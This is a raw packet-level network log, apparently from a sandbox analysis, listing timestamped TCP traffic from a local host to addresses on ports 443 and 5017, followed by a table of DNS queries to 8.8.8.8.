Jun 26, 2022 09:43:17.378746986 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.378765106 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.378817081 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.378827095 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.378834963 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.378881931 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.378882885 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.378895044 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.378940105 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.378957033 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.378966093 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379010916 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379020929 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379067898 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379072905 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379086971 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379112959 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379143953 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379153967 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379199028 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379204035 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379215002 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379246950 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379276037 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379287004 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379334927 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379344940 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379385948 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379395962 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379410982 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379456043 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379467010 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.379497051 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.379508972 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395275116 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395355940 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395371914 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395401001 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395433903 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395436049 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395453930 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395464897 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395492077 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395504951 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395523071 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395534992 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395566940 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395589113 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395775080 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395833969 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395886898 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395941973 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395967007 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.395978928 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.395992994 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.396028042 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.396056890 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.396116018 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.396120071 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.396135092 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.396173000 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.412720919 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.412794113 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.412813902 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.412846088 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.412867069 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.412879944 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.412894964 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.412906885 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.412930012 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.412946939 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.412962914 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.412971973 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413002014 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413008928 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413034916 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413044930 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413070917 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413083076 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413105011 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413114071 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413132906 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413145065 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413162947 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413172960 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413196087 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413224936 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413490057 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413548946 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413556099 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413569927 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413599014 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413614035 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413620949 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413631916 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413672924 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413676977 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413688898 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413717031 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413734913 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413769007 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413821936 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413829088 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413842916 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413885117 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413897991 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.413949013 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.413975000 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.414028883 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.414032936 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.414051056 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.414079905 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.414108038 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415024042 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415090084 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415117979 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415138960 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415155888 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415169954 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415186882 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415198088 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415220976 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415237904 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415246964 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415256977 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415283918 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415297031 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415312052 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415321112 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415348053 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415355921 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415379047 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415389061 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.415415049 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.415443897 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.430968046 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431045055 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431070089 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431097031 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431133986 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431140900 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431148052 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431158066 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431190968 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431221962 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431230068 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431241989 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431269884 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431281090 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431303978 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431313992 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431330919 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431339979 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431382895 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431386948 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431397915 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431442022 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431456089 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431504011 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431510925 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431521893 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431545019 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431566954 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431595087 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431603909 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431622982 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431653023 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431663990 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431710958 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431740999 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431818962 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431837082 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.431909084 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.431922913 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.432008028 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.432224989 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.432245970 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.432285070 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.432317019 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.432334900 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.432359934 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:17.432369947 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.432396889 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.432430029 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:17.618706942 CEST  49749  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:17.787256956 CEST  5017  49749  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:21.646601915 CEST  49754  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:21.814785004 CEST  5017  49754  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:22.319164991 CEST  49754  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:22.484839916 CEST  5017  49754  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:23.019167900 CEST  49754  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:23.183585882 CEST  49751  443  192.168.2.3  162.159.134.233
Jun 26, 2022 09:43:23.183621883 CEST  443  49751  162.159.134.233  192.168.2.3
Jun 26, 2022 09:43:23.186806917 CEST  5017  49754  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:24.253930092 CEST  49763  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:24.431509972 CEST  5017  49763  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:25.067270994 CEST  49763  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:25.243153095 CEST  5017  49763  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:25.768349886 CEST  49763  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:25.943362951 CEST  5017  49763  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:27.034014940 CEST  49766  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:27.222095966 CEST  5017  49766  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:27.772732973 CEST  49766  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:27.953236103 CEST  5017  49766  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:28.566605091 CEST  49766  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:28.742435932 CEST  5017  49766  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:29.778542042 CEST  49767  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:29.951870918 CEST  5017  49767  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:30.519800901 CEST  49767  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:30.710325003 CEST  5017  49767  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:31.220448971 CEST  49767  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:31.389960051 CEST  5017  49767  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:32.434205055 CEST  49768  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:32.599925995 CEST  5017  49768  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:33.126908064 CEST  49768  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:33.291924953 CEST  5017  49768  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:33.830120087 CEST  49768  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:33.998059034 CEST  5017  49768  37.0.14.195  192.168.2.3
Jun 26, 2022 09:43:35.060447931 CEST  49769  5017  192.168.2.3  37.0.14.195
Jun 26, 2022 09:43:35.237716913 CEST  5017  49769  37.0.14.195  192.168.2.3
                                Jun 26, 2022 09:43:35.767699957 CEST497695017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:35.950320005 CEST50174976937.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:36.477570057 CEST497695017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:36.641459942 CEST50174976937.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:38.480386972 CEST497705017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:38.660038948 CEST50174977037.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:39.174254894 CEST497705017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:39.357315063 CEST50174977037.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:39.861820936 CEST497705017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:40.040954113 CEST50174977037.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:41.148549080 CEST497715017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:41.324491978 CEST50174977137.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:41.830785036 CEST497715017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:42.029798031 CEST50174977137.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:42.533925056 CEST497715017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:42.714704037 CEST50174977137.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:43.748924971 CEST497725017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:43.933401108 CEST50174977237.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:44.440331936 CEST497725017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:44.615160942 CEST50174977237.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:45.127975941 CEST497725017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:45.292519093 CEST50174977237.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:46.330517054 CEST497735017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:46.506122112 CEST50174977337.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:47.018630981 CEST497735017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:47.211365938 CEST50174977337.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:47.721868038 CEST497735017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:47.896836996 CEST50174977337.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:48.942389011 CEST497745017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:49.147073030 CEST50174977437.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:49.659554005 CEST497745017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:49.879177094 CEST50174977437.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:50.393940926 CEST497745017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:50.579958916 CEST50174977437.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:51.631499052 CEST497755017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:51.808821917 CEST50174977537.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:52.324282885 CEST497755017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:58.332247972 CEST497755017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:11.480900049 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:11.695023060 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:11.695127964 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:11.704756975 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:11.955065012 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:12.560986042 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:12.564519882 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:12.785697937 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:17.574660063 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:17.633054018 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:17.875022888 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:22.595350027 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:22.599138975 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:23.052977085 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:23.059103012 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:23.059206963 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:23.273741007 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:27.586859941 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:27.605143070 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:27.854959011 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:32.606898069 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:32.609205961 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:32.827030897 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:37.602889061 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:37.607839108 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:37.921314001 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:42.622436047 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:42.625078917 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:42.855470896 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:47.626965046 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:47.770333052 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:48.010862112 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:52.655294895 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:52.656127930 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:52.975090027 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:57.648576975 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:57.649153948 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:57.879748106 CEST50174977837.0.14.195192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 26, 2022 09:42:47.586988926 CEST | 55923 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:42:47.607784033 CEST | 53 | 55923 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:08.861673117 CEST | 57723 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:08.881994963 CEST | 53 | 57723 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:10.750699997 CEST | 58116 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:10.774064064 CEST | 53 | 58116 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:13.523336887 CEST | 57421 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:13.544734001 CEST | 53 | 57421 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:16.191664934 CEST | 65358 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:16.214441061 CEST | 53 | 65358 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:17.117027998 CEST | 49873 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:17.139172077 CEST | 53 | 49873 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:21.610383034 CEST | 63332 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:21.631690025 CEST | 53 | 63332 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:24.196943998 CEST | 49327 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:24.216413021 CEST | 53 | 49327 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:26.996424913 CEST | 58981 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:27.015767097 CEST | 53 | 58981 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:29.759982109 CEST | 64452 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:29.777625084 CEST | 53 | 64452 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:32.412154913 CEST | 61380 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:32.433199883 CEST | 53 | 61380 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:35.037820101 CEST | 63146 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:35.058957100 CEST | 53 | 63146 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:38.386646032 CEST | 52985 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:38.407360077 CEST | 53 | 52985 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:41.126136065 CEST | 58625 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:41.147382021 CEST | 53 | 58625 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:43.728009939 CEST | 52810 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:43.747239113 CEST | 53 | 52810 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:46.310242891 CEST | 50778 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:46.329695940 CEST | 53 | 50778 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:43:48.924099922 CEST | 55151 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:48.941359043 CEST | 53 | 55151 | 8.8.8.8 | 192.168.2.3
